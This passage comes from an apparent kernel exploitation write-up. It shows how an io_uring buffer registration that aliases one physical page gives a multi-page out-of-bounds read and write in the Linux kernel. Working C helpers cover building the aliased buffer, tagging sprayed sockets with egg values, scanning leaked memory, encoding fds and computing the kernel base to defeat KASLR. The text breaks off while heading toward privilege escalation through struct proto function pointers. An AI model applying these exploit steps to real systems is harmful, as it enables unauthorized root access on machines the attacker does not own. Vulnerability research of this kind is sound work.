<p>We can register a buffer spanning <code class="language-plaintext highlighter-rouge">n</code> virtual pages but a single physical one. After registering this buffer we can use <code class="language-plaintext highlighter-rouge">io_uring</code> operations to read from the buffer as well as write to it - giving us out-of-bounds access to <code class="language-plaintext highlighter-rouge">n-1</code> physical pages. Here <code class="language-plaintext highlighter-rouge">n</code> could be as high as the limit on the number of mappings allowed to a single userland process (the <code class="language-plaintext highlighter-rouge">vm.max_map_count</code> sysctl). We have a multi-page out-of-bounds read and write.</p>
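<p>To make the layout concrete, here is a minimal userland sketch of how such a buffer could be built. It assumes a <code class="language-plaintext highlighter-rouge">memfd</code> as the backing object and maps its single page repeatedly with <code class="language-plaintext highlighter-rouge">MAP_FIXED</code>; the helper name <code class="language-plaintext highlighter-rouge">map_one_page_n_times</code> is made up for illustration and this is not necessarily how the final exploit does it.</p>

```c
#define _GNU_SOURCE
#include <assert.h>
#include <stddef.h>
#include <sys/mman.h>
#include <unistd.h>

/*
 * Map the single page backing a memfd n_pages times, back to back.
 * Returns the start of the virtually contiguous range, or NULL on failure.
 * Hypothetical helper, written only to illustrate the buffer layout.
 */
static void *map_one_page_n_times(size_t n_pages)
{
    assert(n_pages > 0);

    long page_size = sysconf(_SC_PAGESIZE);
    if (page_size <= 0)
        return NULL;
    size_t page = (size_t)page_size;

    /* One page of shared memory that every virtual page will alias. */
    int fd = memfd_create("aliased_page", 0);
    if (fd < 0)
        return NULL;
    if (ftruncate(fd, (off_t)page) < 0) {
        close(fd);
        return NULL;
    }

    /* Reserve a contiguous virtual range so MAP_FIXED cannot clobber other mappings. */
    char *base = mmap(NULL, n_pages * page, PROT_NONE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (base == MAP_FAILED) {
        close(fd);
        return NULL;
    }

    /* Every virtual page maps offset 0 of the memfd, i.e. the same physical page. */
    for (size_t i = 0; i < n_pages; i++) {
        void *p = mmap(base + i * page, page, PROT_READ | PROT_WRITE,
                       MAP_SHARED | MAP_FIXED, fd, 0);
        if (p == MAP_FAILED) {
            munmap(base, n_pages * page);
            close(fd);
            return NULL;
        }
    }

    close(fd); /* the mappings keep the page alive */
    return base;
}
```

<p>A write through the first virtual page is visible through every other one, which confirms that they all alias one physical page. The returned range, with a length of <code class="language-plaintext highlighter-rouge">n</code> pages, is what would then be handed to the kernel as the <code class="language-plaintext highlighter-rouge">iovec</code> of a fixed buffer registration.</p>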

<p>This is an incredibly powerful primitive, perhaps even the most powerful I have seen yet.</p>

<h3 id="target-objects-">Target Objects <a name="targetobjects"></a></h3>
<p>We are looking for target objects that allow us to leak KASLR and get some kind of code execution.</p>

<p>Thankfully, as we have an OOB read and write to whole physical pages, we don’t have any limits on the objects themselves. We don’t care what slab they use, what their size is or anything like that.</p>

<p>We do, however, have <em>some</em> requirements. We need to be able to find our target objects and identify them. We will be leaking thousands of pages and we need to be able to find our needle(s) in the haystack. We need to be able to place an <a href="https://fuzzysecurity.com/tutorials/expDev/4.html">egg</a> in the object itself, which we can later use to identify it.</p>

<h4 id="sockets-">Sockets <a name="sockets"></a></h4>
<p>Here sockets are our friend. They are pretty massive objects containing both user-controlled fields, which can be used to place an egg, as well as function pointers which can be used to leak KASLR.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">sock</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">sock_common</span>         <span class="n">__sk_common</span><span class="p">;</span>          <span class="cm">/*     0   136 */</span>
	<span class="cm">/* --- cacheline 2 boundary (128 bytes) was 8 bytes ago --- */</span>
	<span class="k">struct</span> <span class="n">dst_entry</span> <span class="o">*</span>         <span class="n">sk_rx_dst</span><span class="p">;</span>            <span class="cm">/*   136     8 */</span>
	<span class="kt">int</span>                        <span class="n">sk_rx_dst_ifindex</span><span class="p">;</span>    <span class="cm">/*   144     4 */</span>
	<span class="n">u32</span>                        <span class="n">sk_rx_dst_cookie</span><span class="p">;</span>     <span class="cm">/*   148     4 */</span>
	<span class="n">socket_lock_t</span>              <span class="n">sk_lock</span><span class="p">;</span>              <span class="cm">/*   152    32 */</span>
	<span class="n">atomic_t</span>                   <span class="n">sk_drops</span><span class="p">;</span>             <span class="cm">/*   184     4 */</span>
	<span class="kt">int</span>                        <span class="n">sk_rcvlowat</span><span class="p">;</span>          <span class="cm">/*   188     4 */</span>
	<span class="cm">/* --- cacheline 3 boundary (192 bytes) --- */</span>
	<span class="k">struct</span> <span class="n">sk_buff_head</span>        <span class="n">sk_error_queue</span><span class="p">;</span>       <span class="cm">/*   192    24 */</span>
	<span class="k">struct</span> <span class="n">sk_buff_head</span>        <span class="n">sk_receive_queue</span><span class="p">;</span>     <span class="cm">/*   216    24 */</span>
	<span class="k">struct</span> <span class="p">{</span>
		<span class="n">atomic_t</span>           <span class="n">rmem_alloc</span><span class="p">;</span>           <span class="cm">/*   240     4 */</span>
		<span class="kt">int</span>                <span class="n">len</span><span class="p">;</span>                  <span class="cm">/*   244     4 */</span>
		<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span>   <span class="n">head</span><span class="p">;</span>                 <span class="cm">/*   248     8 */</span>
		<span class="cm">/* --- cacheline 4 boundary (256 bytes) --- */</span>
		<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span>   <span class="n">tail</span><span class="p">;</span>                 <span class="cm">/*   256     8 */</span>
	<span class="p">}</span> <span class="n">sk_backlog</span><span class="p">;</span>                                    <span class="cm">/*   240    24 */</span>
	<span class="kt">int</span>                        <span class="n">sk_forward_alloc</span><span class="p">;</span>     <span class="cm">/*   264     4 */</span>
	<span class="n">u32</span>                        <span class="n">sk_reserved_mem</span><span class="p">;</span>      <span class="cm">/*   268     4 */</span>
	<span class="kt">unsigned</span> <span class="kt">int</span>               <span class="n">sk_ll_usec</span><span class="p">;</span>           <span class="cm">/*   272     4 */</span>
	<span class="kt">unsigned</span> <span class="kt">int</span>               <span class="n">sk_napi_id</span><span class="p">;</span>           <span class="cm">/*   276     4 */</span>
	<span class="kt">int</span>                        <span class="n">sk_rcvbuf</span><span class="p">;</span>            <span class="cm">/*   280     4 */</span>

	<span class="cm">/* XXX 4 bytes hole, try to pack */</span>

	<span class="k">struct</span> <span class="n">sk_filter</span> <span class="o">*</span>         <span class="n">sk_filter</span><span class="p">;</span>            <span class="cm">/*   288     8 */</span>
	<span class="k">union</span> <span class="p">{</span>
		<span class="k">struct</span> <span class="n">socket_wq</span> <span class="o">*</span> <span class="n">sk_wq</span><span class="p">;</span>                <span class="cm">/*   296     8 */</span>
		<span class="k">struct</span> <span class="n">socket_wq</span> <span class="o">*</span> <span class="n">sk_wq_raw</span><span class="p">;</span>            <span class="cm">/*   296     8 */</span>
	<span class="p">};</span>                                               <span class="cm">/*   296     8 */</span>
	<span class="k">struct</span> <span class="n">xfrm_policy</span> <span class="o">*</span>       <span class="n">sk_policy</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>         <span class="cm">/*   304    16 */</span>
	<span class="cm">/* --- cacheline 5 boundary (320 bytes) --- */</span>
	<span class="k">struct</span> <span class="n">dst_entry</span> <span class="o">*</span>         <span class="n">sk_dst_cache</span><span class="p">;</span>         <span class="cm">/*   320     8 */</span>
	<span class="n">atomic_t</span>                   <span class="n">sk_omem_alloc</span><span class="p">;</span>        <span class="cm">/*   328     4 */</span>
	<span class="kt">int</span>                        <span class="n">sk_sndbuf</span><span class="p">;</span>            <span class="cm">/*   332     4 */</span>
	<span class="kt">int</span>                        <span class="n">sk_wmem_queued</span><span class="p">;</span>       <span class="cm">/*   336     4 */</span>
	<span class="n">refcount_t</span>                 <span class="n">sk_wmem_alloc</span><span class="p">;</span>        <span class="cm">/*   340     4 */</span>
	<span class="kt">long</span> <span class="kt">unsigned</span> <span class="kt">int</span>          <span class="n">sk_tsq_flags</span><span class="p">;</span>         <span class="cm">/*   344     8 */</span>
	<span class="k">union</span> <span class="p">{</span>
		<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span>   <span class="n">sk_send_head</span><span class="p">;</span>         <span class="cm">/*   352     8 */</span>
		<span class="k">struct</span> <span class="n">rb_root</span>     <span class="n">tcp_rtx_queue</span><span class="p">;</span>        <span class="cm">/*   352     8 */</span>
	<span class="p">};</span>                                               <span class="cm">/*   352     8 */</span>
	<span class="k">struct</span> <span class="n">sk_buff_head</span>        <span class="n">sk_write_queue</span><span class="p">;</span>       <span class="cm">/*   360    24 */</span>
	<span class="cm">/* --- cacheline 6 boundary (384 bytes) --- */</span>
	<span class="n">__s32</span>                      <span class="n">sk_peek_off</span><span class="p">;</span>          <span class="cm">/*   384     4 */</span>
	<span class="kt">int</span>                        <span class="n">sk_write_pending</span><span class="p">;</span>     <span class="cm">/*   388     4 */</span>
	<span class="n">__u32</span>                      <span class="n">sk_dst_pending_confirm</span><span class="p">;</span> <span class="cm">/*   392     4 */</span>
	<span class="n">u32</span>                        <span class="n">sk_pacing_status</span><span class="p">;</span>     <span class="cm">/*   396     4 */</span>
	<span class="kt">long</span> <span class="kt">int</span>                   <span class="n">sk_sndtimeo</span><span class="p">;</span>          <span class="cm">/*   400     8 */</span>
	<span class="k">struct</span> <span class="n">timer_list</span>          <span class="n">sk_timer</span><span class="p">;</span>             <span class="cm">/*   408    40 */</span>

	<span class="cm">/* XXX last struct has 4 bytes of padding */</span>

	<span class="cm">/* --- cacheline 7 boundary (448 bytes) --- */</span>
	<span class="n">__u32</span>                      <span class="n">sk_priority</span><span class="p">;</span>          <span class="cm">/*   448     4 */</span>
	<span class="n">__u32</span>                      <span class="n">sk_mark</span><span class="p">;</span>              <span class="cm">/*   452     4 */</span>
	<span class="kt">long</span> <span class="kt">unsigned</span> <span class="kt">int</span>          <span class="n">sk_pacing_rate</span><span class="p">;</span>       <span class="cm">/*   456     8 */</span>
	<span class="kt">long</span> <span class="kt">unsigned</span> <span class="kt">int</span>          <span class="n">sk_max_pacing_rate</span><span class="p">;</span>   <span class="cm">/*   464     8 */</span>
    <span class="c1">// .. many more fields</span>
	<span class="cm">/* size: 760, cachelines: 12, members: 92 */</span>
	<span class="cm">/* sum members: 754, holes: 1, sum holes: 4 */</span>
	<span class="cm">/* sum bitfield members: 16 bits (2 bytes) */</span>
	<span class="cm">/* paddings: 2, sum paddings: 6 */</span>
	<span class="cm">/* forced alignments: 1 */</span>
	<span class="cm">/* last cacheline: 56 bytes */</span>
<span class="p">}</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">__aligned__</span><span class="p">(</span><span class="mi">8</span><span class="p">)));</span>
</code></pre></div></div>
<p>Taking a look at <code class="language-plaintext highlighter-rouge">sk_setsockopt</code> in <a href="https://elixir.bootlin.com/linux/latest/source/net/core/sock.c#L1942">net/core/sock.c</a>, we can see which fields of the sock structure we can set.</p>

<p>Some fields we could potentially set, like <code class="language-plaintext highlighter-rouge">sk_mark</code>, would require us to drop into a network namespace to obtain <code class="language-plaintext highlighter-rouge">CAP_NET_ADMIN</code>. Thankfully, there are some options that can be set without any such requirement.</p>

<p>Some good options that we could utilize are <code class="language-plaintext highlighter-rouge">SO_MAX_PACING_RATE</code> (sets <code class="language-plaintext highlighter-rouge">sk_max_pacing_rate</code>), <code class="language-plaintext highlighter-rouge">SO_SNDBUF</code> (sets <code class="language-plaintext highlighter-rouge">sk_sndbuf</code>) and <code class="language-plaintext highlighter-rouge">SO_RCVBUF</code> (sets <code class="language-plaintext highlighter-rouge">sk_rcvbuf</code>).</p>

<h4 id="two-eggs-">Two eggs <a name="twoeggs"></a></h4>
<p>Perhaps the best option we could pick here is <code class="language-plaintext highlighter-rouge">SO_MAX_PACING_RATE</code>. It has one obvious advantage - we can use it to place <em>two eggs</em>, one at <code class="language-plaintext highlighter-rouge">sk_max_pacing_rate</code> and one at <code class="language-plaintext highlighter-rouge">sk_pacing_rate</code>. When the option <code class="language-plaintext highlighter-rouge">SO_MAX_PACING_RATE</code> is being set, the value of <code class="language-plaintext highlighter-rouge">sk_pacing_rate</code> is also set to the new value of <code class="language-plaintext highlighter-rouge">sk_max_pacing_rate</code> if that value is lower than the current value of <code class="language-plaintext highlighter-rouge">sk_pacing_rate</code>. Looking at the function <a href="https://elixir.bootlin.com/linux/latest/source/net/core/sock.c#L3477">sock_init_data_uid</a> we see that <code class="language-plaintext highlighter-rouge">sk_pacing_rate</code> is initialized to <code class="language-plaintext highlighter-rouge">~0UL = 0xffffffffffffffff</code>, so on a freshly created socket any egg we choose is lower and ends up in both fields.</p>
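<p>As a rough sketch, planting the egg could look like the following. The egg value <code class="language-plaintext highlighter-rouge">EGG</code> and the helper <code class="language-plaintext highlighter-rouge">make_egg_socket</code> are placeholders chosen for this example, and the fallback definition of <code class="language-plaintext highlighter-rouge">SO_MAX_PACING_RATE</code> assumes the asm-generic value used on x86.</p>

```c
#include <assert.h>
#include <sys/socket.h>
#include <unistd.h>

#ifndef SO_MAX_PACING_RATE
#define SO_MAX_PACING_RATE 47 /* asm-generic value, used only if the libc headers lack it */
#endif

/* Hypothetical egg, picked arbitrarily for this sketch. */
#define EGG 0xdeadc0deUL

/*
 * Create a TCP socket and plant the egg through SO_MAX_PACING_RATE.
 * Returns the socket fd, or -1 on failure.
 */
static int make_egg_socket(unsigned long egg)
{
    /* ~0UL is the default "no limit" value, so it would not stand out in a dump. */
    assert(egg != ~0UL);

    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;

    /* Passing an unsigned long lets the kernel take the full-width value. */
    if (setsockopt(fd, SOL_SOCKET, SO_MAX_PACING_RATE, &egg, sizeof(egg)) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}
```

<p>Reading the option back with <code class="language-plaintext highlighter-rouge">getsockopt</code> should return the same value, which is a cheap way to check that the egg was accepted before spraying many sockets.</p>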

<p>The obvious question is - why would we need two eggs? As we are leaking many pages we could meet our egg outside the context of a <code class="language-plaintext highlighter-rouge">sock</code> object. I tested it and indeed sometimes the first egg found was not inside a <code class="language-plaintext highlighter-rouge">sock</code> object. By looking for two eggs at a fixed distance from one another, we ensure that the matches we find are the <code class="language-plaintext highlighter-rouge">sock</code> objects we are looking for.</p>
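<p>The two-egg check can be sketched as a simple scan over the leaked bytes. The offsets 456 and 464 come from the <code class="language-plaintext highlighter-rouge">struct sock</code> layout shown above and are specific to that kernel build; the function name <code class="language-plaintext highlighter-rouge">find_sock</code> is made up, and the sketch assumes the dump starts at a page boundary so that objects are 8-byte aligned within it.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Field offsets taken from the pahole output of struct sock shown above. */
#define SK_PACING_RATE_OFF     456
#define SK_MAX_PACING_RATE_OFF 464

/*
 * Scan a leaked memory dump for a struct sock that carries the egg in both
 * sk_pacing_rate and sk_max_pacing_rate.
 * Returns the offset of the start of the sock inside buf, or -1 if none is found.
 */
static long find_sock(const uint8_t *buf, size_t len, uint64_t egg)
{
    assert(buf != NULL);

    /* struct sock is 8-byte aligned, so only aligned candidates are checked. */
    for (size_t off = 0; off + SK_MAX_PACING_RATE_OFF + sizeof(uint64_t) <= len; off += 8) {
        uint64_t rate, max_rate;

        memcpy(&rate, buf + off + SK_PACING_RATE_OFF, sizeof(rate));
        memcpy(&max_rate, buf + off + SK_MAX_PACING_RATE_OFF, sizeof(max_rate));

        /* A lone egg is ignored; both fields must match. */
        if (rate == egg && max_rate == egg)
            return (long)off;
    }
    return -1;
}
```

<p>A stray copy of the egg elsewhere in the dump does not produce a match, because the neighbouring field would also have to hold the same value.</p>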

<h4 id="identifying-the-sockets-">Identifying the sockets <a name="idsockets"></a></h4>
<p>We want to have a way to identify which socket we have found in memory. We can do that through the <code class="language-plaintext highlighter-rouge">SO_SNDBUF</code> option by storing the file descriptor of the socket in it. The kernel does not store the value as is: it writes <code class="language-plaintext highlighter-rouge">max(2 * val, SOCK_MIN_SNDBUF)</code> to <code class="language-plaintext highlighter-rouge">sk_sndbuf</code>. We therefore have to “encode” the value by passing <code class="language-plaintext highlighter-rouge">fd + SOCK_MIN_SNDBUF</code> and “decode” it on read by doing <code class="language-plaintext highlighter-rouge">val / 2 - SOCK_MIN_SNDBUF</code>.</p>

<p>The value of <code class="language-plaintext highlighter-rouge">SOCK_MIN_SNDBUF</code> is calculated using the following formula: <code class="language-plaintext highlighter-rouge">2 * (2048 + ALIGN(sizeof(struct sk_buff), 1 &lt;&lt; L1_CACHE_SHIFT))</code>. The exact value depends on the value of <a href="https://elixir.bootlin.com/linux/v6.3-rc1/source/arch/x86/include/asm/cache.h#L9">L1_CACHE_SHIFT</a>. In my case <code class="language-plaintext highlighter-rouge">L1_CACHE_SHIFT = 6</code>, so the size of <code class="language-plaintext highlighter-rouge">struct sk_buff</code> is rounded up to a multiple of 64 bytes, which comes to 256 here, and therefore <code class="language-plaintext highlighter-rouge">SOCK_MIN_SNDBUF = 2 * (2048 + 256) = 4608</code>.</p>
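<p>The encoding is easy to get wrong, so here is the arithmetic as a small sketch. <code class="language-plaintext highlighter-rouge">SOCK_MIN_SNDBUF</code> is hardcoded to the value from my setup, and <code class="language-plaintext highlighter-rouge">kernel_stored_sndbuf</code> is only a userland model of what the kernel writes to <code class="language-plaintext highlighter-rouge">sk_sndbuf</code>; it ignores the cap the kernel applies from <code class="language-plaintext highlighter-rouge">net.core.wmem_max</code>, so the encoded value is assumed to stay below that limit.</p>

```c
#include <assert.h>

/* Value from the text; it depends on the target kernel's sk_buff size and L1_CACHE_SHIFT. */
#define SOCK_MIN_SNDBUF 4608

/* Value to pass to setsockopt(SO_SNDBUF) so that the fd survives the kernel's doubling. */
static int encode_fd(int fd)
{
    assert(fd >= 0);
    return fd + SOCK_MIN_SNDBUF;
}

/* Recover the fd from a leaked sk_sndbuf field. */
static int decode_fd(int sk_sndbuf)
{
    return sk_sndbuf / 2 - SOCK_MIN_SNDBUF;
}

/* Userland model of the stored value: doubled, but never below SOCK_MIN_SNDBUF. */
static int kernel_stored_sndbuf(int val)
{
    int doubled = val * 2;
    return doubled > SOCK_MIN_SNDBUF ? doubled : SOCK_MIN_SNDBUF;
}
```

<p>Passing a raw file descriptor such as 3 would simply be clamped to <code class="language-plaintext highlighter-rouge">SOCK_MIN_SNDBUF</code> and lost, which is why the offset is added before the call.</p>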

<h3 id="leaking-kaslr-">Leaking KASLR <a name="kaslr"></a></h3>
<p>At the end of <code class="language-plaintext highlighter-rouge">struct sock</code>, there are quite a few function pointers.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">sock</span> <span class="p">{</span>
    <span class="p">...</span>
	<span class="kt">void</span>                       <span class="p">(</span><span class="o">*</span><span class="n">sk_state_change</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">);</span> <span class="cm">/*   672     8 */</span>
	<span class="kt">void</span>                       <span class="p">(</span><span class="o">*</span><span class="n">sk_data_ready</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">);</span> <span class="cm">/*   680     8 */</span>
	<span class="kt">void</span>                       <span class="p">(</span><span class="o">*</span><span class="n">sk_write_space</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">);</span> <span class="cm">/*   688     8 */</span>
	<span class="kt">void</span>                       <span class="p">(</span><span class="o">*</span><span class="n">sk_error_report</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">);</span> <span class="cm">/*   696     8 */</span>
	<span class="cm">/* --- cacheline 11 boundary (704 bytes) --- */</span>
	<span class="kt">int</span>                        <span class="p">(</span><span class="o">*</span><span class="n">sk_backlog_rcv</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="p">);</span> <span class="cm">/*   704     8 */</span>
	<span class="kt">void</span>                       <span class="p">(</span><span class="o">*</span><span class="n">sk_destruct</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">);</span> <span class="cm">/*   712     8 */</span>
    <span class="p">...</span>
<span class="p">}</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">__aligned__</span><span class="p">(</span><span class="mi">8</span><span class="p">)));</span>
</code></pre></div></div>
<p>Leaking any of them is sufficient to defeat KASLR. For a TCP socket, they will be set to the following functions:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sk_state_change &lt;-&gt; &lt;sock_def_wakeup&gt;,
sk_data_ready &lt;-&gt; &lt;sock_def_readable&gt;,
sk_write_space &lt;-&gt; &lt;sk_stream_write_space&gt;,
sk_error_report &lt;-&gt; &lt;sock_def_error_report&gt;,
sk_backlog_rcv &lt;-&gt; &lt;tcp_v4_do_rcv&gt;,
sk_destruct &lt;-&gt; &lt;inet_sock_destruct&gt;
</code></pre></div></div>
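<p>Turning a leaked pointer into the kernel base is a single subtraction. The sketch below reads <code class="language-plaintext highlighter-rouge">sk_data_ready</code> at offset 680 (from the layout above) out of a leaked copy of the object. The parameter <code class="language-plaintext highlighter-rouge">symbol_offset</code> stands for the distance of <code class="language-plaintext highlighter-rouge">sock_def_readable</code> from the kernel text base; it is specific to the target build and has to be looked up separately, so no concrete value is given here.</p>

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Offset of sk_data_ready inside struct sock, from the pahole output above. */
#define SK_DATA_READY_OFF 680

/* Read a 64-bit field out of a leaked copy of a struct sock. */
static uint64_t read_u64(const uint8_t *sock_image, size_t off)
{
    uint64_t v;

    assert(sock_image != NULL);
    memcpy(&v, sock_image + off, sizeof(v));
    return v;
}

/*
 * Compute the randomized kernel text base from a leaked function pointer.
 * symbol_offset is the build-specific distance of that function from the base.
 */
static uint64_t kernel_base_from_leak(uint64_t leaked_ptr, uint64_t symbol_offset)
{
    assert(leaked_ptr >= symbol_offset);
    return leaked_ptr - symbol_offset;
}
```

<p>With the base known, the address of any other kernel symbol is the base plus that symbol’s own offset in the same build.</p>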

<h3 id="privilege-escalation-">Privilege Escalation <a name="privesc"></a></h3>
<p>Our ultimate goal is to achieve privilege escalation. With KASLR out of the way, we can move towards it.</p>

<p>As we already have control over a <code class="language-plaintext highlighter-rouge">sock</code> object, we can use the same object to escalate.
The first member of the <code class="language-plaintext highlighter-rouge">sock</code> object is <code class="language-plaintext highlighter-rouge">struct sock_common</code>, which is the minimal network layer representation of sockets in the kernel.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">sock_common</span> <span class="p">{</span>
	<span class="k">union</span> <span class="p">{</span>
		<span class="n">__addrpair</span>         <span class="n">skc_addrpair</span><span class="p">;</span>         <span class="cm">/*     0     8 */</span>
		<span class="k">struct</span> <span class="p">{</span>
			<span class="n">__be32</span>     <span class="n">skc_daddr</span><span class="p">;</span>            <span class="cm">/*     0     4 */</span>
			<span class="n">__be32</span>     <span class="n">skc_rcv_saddr</span><span class="p">;</span>        <span class="cm">/*     4     4 */</span>
		<span class="p">};</span>                                       <span class="cm">/*     0     8 */</span>
	<span class="p">};</span>                                               <span class="cm">/*     0     8 */</span>
	<span class="k">union</span> <span class="p">{</span>
		<span class="kt">unsigned</span> <span class="kt">int</span>       <span class="n">skc_hash</span><span class="p">;</span>             <span class="cm">/*     8     4 */</span>
		<span class="n">__u16</span>              <span class="n">skc_u16hashes</span><span class="p">[</span><span class="mi">2</span><span class="p">];</span>     <span class="cm">/*     8     4 */</span>
	<span class="p">};</span>                                               <span class="cm">/*     8     4 */</span>
	<span class="k">union</span> <span class="p">{</span>
		<span class="n">__portpair</span>         <span class="n">skc_portpair</span><span class="p">;</span>         <span class="cm">/*    12     4 */</span>
		<span class="k">struct</span> <span class="p">{</span>
			<span class="n">__be16</span>     <span class="n">skc_dport</span><span class="p">;</span>            <span class="cm">/*    12     2 */</span>
			<span class="n">__u16</span>      <span class="n">skc_num</span><span class="p">;</span>              <span class="cm">/*    14     2 */</span>
		<span class="p">};</span>                                       <span class="cm">/*    12     4 */</span>
	<span class="p">};</span>                                               <span class="cm">/*    12     4 */</span>
	<span class="kt">short</span> <span class="kt">unsigned</span> <span class="kt">int</span>         <span class="n">skc_family</span><span class="p">;</span>           <span class="cm">/*    16     2 */</span>
	<span class="k">volatile</span> <span class="kt">unsigned</span> <span class="kt">char</span>     <span class="n">skc_state</span><span class="p">;</span>            <span class="cm">/*    18     1 */</span>
	<span class="kt">unsigned</span> <span class="kt">char</span>              <span class="n">skc_reuse</span><span class="o">:</span><span class="mi">4</span><span class="p">;</span>          <span class="cm">/*    19: 0  1 */</span>
	<span class="kt">unsigned</span> <span class="kt">char</span>              <span class="n">skc_reuseport</span><span class="o">:</span><span class="mi">1</span><span class="p">;</span>      <span class="cm">/*    19: 4  1 */</span>
	<span class="kt">unsigned</span> <span class="kt">char</span>              <span class="n">skc_ipv6only</span><span class="o">:</span><span class="mi">1</span><span class="p">;</span>       <span class="cm">/*    19: 5  1 */</span>
	<span class="kt">unsigned</span> <span class="kt">char</span>              <span class="n">skc_net_refcnt</span><span class="o">:</span><span class="mi">1</span><span class="p">;</span>     <span class="cm">/*    19: 6  1 */</span>

	<span class="cm">/* XXX 1 bit hole, try to pack */</span>

	<span class="kt">int</span>                        <span class="n">skc_bound_dev_if</span><span class="p">;</span>     <span class="cm">/*    20     4 */</span>
	<span class="k">union</span> <span class="p">{</span>
		<span class="k">struct</span> <span class="n">hlist_node</span>  <span class="n">skc_bind_node</span><span class="p">;</span>        <span class="cm">/*    24    16 */</span>
		<span class="k">struct</span> <span class="n">hlist_node</span>  <span class="n">skc_portaddr_node</span><span class="p">;</span>    <span class="cm">/*    24    16 */</span>
	<span class="p">};</span>                                               <span class="cm">/*    24    16 */</span>
	<span class="k">struct</span> <span class="n">proto</span> <span class="o">*</span>             <span class="n">skc_prot</span><span class="p">;</span>             <span class="cm">/*    40     8 */</span>

	<span class="p">...</span>

	<span class="cm">/* size: 136, cachelines: 3, members: 25 */</span>
	<span class="cm">/* sum members: 135 */</span>
	<span class="cm">/* sum bitfield members: 7 bits, bit holes: 1, sum bit holes: 1 bits */</span>
	<span class="cm">/* last cacheline: 8 bytes */</span>
<span class="p">};</span>
</code></pre></div></div>
<p>At offset 40 from its start we can see a pointer to a <code class="language-plaintext highlighter-rouge">struct proto</code> object. A <code class="language-plaintext highlighter-rouge">proto</code> object describes how operations should be handled at the transport layer. It is primarily a collection of function pointers.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">proto</span> <span class="p">{</span>
	<span class="kt">void</span>                       <span class="p">(</span><span class="o">*</span><span class="n">close</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="kt">long</span> <span class="kt">int</span><span class="p">);</span> <span class="cm">/*     0     8 */</span>
	<span class="kt">int</span>                        <span class="p">(</span><span class="o">*</span><span class="n">pre_connect</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span> <span class="cm">/*     8     8 */</span>
	<span class="kt">int</span>                        <span class="p">(</span><span class="o">*</span><span class="n">connect</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span> <span class="cm">/*    16     8 */</span>
	<span class="kt">int</span>                        <span class="p">(</span><span class="o">*</span><span class="n">disconnect</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span> <span class="cm">/*    24     8 */</span>
	<span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span>              <span class="p">(</span><span class="o">*</span><span class="n">accept</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">int</span> <span class="o">*</span><span class="p">,</span> <span class="n">bool</span><span class="p">);</span> <span class="cm">/*    32     8 */</span>
	<span class="kt">int</span>                        <span class="p">(</span><span class="o">*</span><span class="n">ioctl</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">long</span> <span class="kt">unsigned</span> <span class="kt">int</span><span class="p">);</span> <span class="cm">/*    40     8 */</span>
	<span class="kt">int</span>                        <span class="p">(</span><span class="o">*</span><span class="n">init</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">);</span> <span class="cm">/*    48     8 */</span>
	<span class="kt">void</span>                       <span class="p">(</span><span class="o">*</span><span class="n">destroy</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">);</span> <span class="cm">/*    56     8 */</span>
	<span class="cm">/* --- cacheline 1 boundary (64 bytes) --- */</span>
	<span class="kt">void</span>                       <span class="p">(</span><span class="o">*</span><span class="n">shutdown</span><span class="p">)(</span><span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span> <span class="cm">/*    64     8 */</span>
